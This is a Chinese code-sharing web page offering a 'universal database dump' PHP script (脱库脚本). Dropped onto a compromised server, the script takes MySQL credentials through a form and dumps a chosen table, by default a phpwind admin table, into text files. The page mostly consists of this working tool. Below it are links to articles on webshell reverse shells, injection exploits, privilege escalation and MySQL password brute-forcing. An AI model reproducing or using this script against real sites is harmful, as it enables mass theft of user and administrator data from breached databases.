MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

所属分类: 网络安全 / 脚本攻防 阅读数: 228
收藏 0 赞 0 分享

复制代码
代码如下:

<html>
<head>
<title>:: hExI3_Securi7y_TeAm...SCRIPT_FILENAME : <?=$_SERVER["PHP_SELF"]?></title>
<style type="text/css">
.font{
size : 2px;
}
</style>
</head>
<body>
<h4>Mysql Database on Tables to Txt...</h4>
#_E-mail:go_root#Hotmail.com

#_Author:HYrz

--------------------------------------------------------

<form action="" method="POST" name="Submit">
<b>Host: </b> <input type="text" name="host" value="127.0.0.1:3306">

<b> User: </b> <input type="text" name="user" value="root">

<b> Password: </b> <input type="text" name="pass" value="root">

<b>Database Check: </b> <input type="text" name="database" value="phpwms">
<b> Tables is: </b> <input type="text" name="table" value="pw_admin">

<b>New_Data Filename:</b> <input type="text" name="back_file" value="data.txt">


<a href = "https://www.jb51.net">脚本之家</a>

<input type="submit" name="submit" value="0utPut">

</form>
</body>
<?php
ini_set('display_errors', 1);
set_time_limit(0);
//error_reporting(E_ALL);
function ShowMessage($Str)
{
$FILENAME = $_SERVER["PHP_SELF"];
Die('<script>document.write("'.$Str.'")</script>');
Die('<script>window.localtion="'.$FILENAME.'";</script>');
}
function _Printf($Str, $type = '')
{
if (empty($type))
echo '<font color="red" face="verdana" size="2px">[+]&nbsp'.$Str.'</font>
';
else
echo '<font color="red" face="verdana" size="2px">[#] '.$Str.'</font>
';
}
function dirsize($dir) {
@$dh = opendir($dir);
$size = 0;
while ($file = @readdir($dh)) {
if ($file != "." and $file != "..") {
$path = $dir."/".$file;
if (is_dir($path)) {
$size += dirsize($path);
} elseif (is_file($path)) {
$size += filesize($path);
}
}
}
@closedir($dh);
return $size;
}
if (empty($_POST['submit'])) exit();
$db_host = $_POST["host"];
$db_user = $_POST["user"];
$db_pass = $_POST["pass"];
$db_database = $_POST["database"];
$db_table = $_POST["table"];
$backDB_Filename = $_POST["back_file"];
//endPost
if (empty($db_host)){
$_POST["host"] = $db_host;
ShowMessage("Messagebox: Host Error!");
}elseif (empty($db_user)) {
$_POST["user"] = $db_user;
ShowMessage("Messagebox: User Error!");
}elseif (empty($db_pass)){
$_POST["pass"] = $db_pass;
ShowMessage("Messagebox: Pass Error!");
}elseif (empty($db_database)) {
$_POST["database"] = $db_database;
ShowMessage("Messagebox: Database Error!");
}elseif (empty($db_table)) {
$_POST["table"] = $db_table;
ShowMessage("Messagebox: table Error!");
}elseif (empty($backDB_Filename)) {
$_POST["back_file"] = $backDB_Filename;
ShowMessage("Messagebox: backDB_Filename Error!");
} #endif
if (!is_dir('data_xiaosan')) {
mkdir('data_xiaosan',0777);
}#endif
$sql = mysql_connect($db_host,$db_user,$db_pass) or ShowMessage('<font color="red" Size=2px>[#] connect Error ! </font>');
mysql_select_db($db_database,$sql) or die("Could not connect: " . mysql_error());
$result = mysql_query("SELECT * FROM $db_table",$sql) or die("Could not connect: " . mysql_error());
$FieldCount = mysql_query("SELECT CoUnt(*) FrOm $db_table",$sql);
$F_Num = mysql_fetch_row($FieldCount);
_Printf('InforMatIon : --------------','Main');
_Printf("TableCounts :". + $F_Num[0]);
if ($F_Num[0] < 500){
$SuB1 = $F_Num[0] / 2;
} else $SuB1 = 500; //endif
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$i = $i+1;
$tmp .= implode("::", $row)."\n";
if(!($i%$SuB1)){
$filename_ = 'data_xiaosan/'.intval($i/$SuB1).$backDB_Filename;
file_put_contents($filename_,$tmp);
$tmp = '';
}#endif
}#endwhile
mysql_free_result($result);
mysql_close($sql);
if (dirsize('data_xiaosan')>1){
_Printf("<b>Msg : OutPut_Succ!</b>");}else
_Printf("Err : output fail !"); //endPri
?>
</html>
更多精彩内容其他人还在看

PHP Webshell 下的端口反弹方法

phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
收藏 0 赞 0 分享

万博企业网站管理系统注入漏洞(MemberLogin.asp)

这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
收藏 0 赞 0 分享

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术
收藏 0 赞 0 分享

mysql注入导库脚本代码

mysql注入导库脚本代码,学习安全的朋友要注意防范。
收藏 0 赞 0 分享

BOSSI 公司企业网站管理系统注入&上传漏洞利用

BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加&删除,可以不用修改代码
收藏 0 赞 0 分享

MSSQL 2005 入侵提权过程分享

本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说
收藏 0 赞 0 分享

设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等

设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等,需要的朋友可以参考下。
收藏 0 赞 0 分享

PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

PHP Mysql 密码暴力破解,本机暴力破解 3306 端口,源码。代码简单的不能再简单了,就不解释了,功能很简单
收藏 0 赞 0 分享

PHP+MySQL手工注入语句大全 MySQL手工注入语句总结

PHP + MySQL 手工注入语句大全,MySQL 手工注入语句总结,MySQL,注入语句。暴字段长度 匹配字段 暴字段位置 利用内置函数暴数据库信息 不用猜解可用字段暴数据库信息(有些网站不适用): 操作系统信息
收藏 0 赞 0 分享

PHP 双字节、宽字节编码漏洞

PHP 双字节、宽字节编码漏洞。看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。还是用一个demo.php显示效果
收藏 0 赞 0 分享
查看更多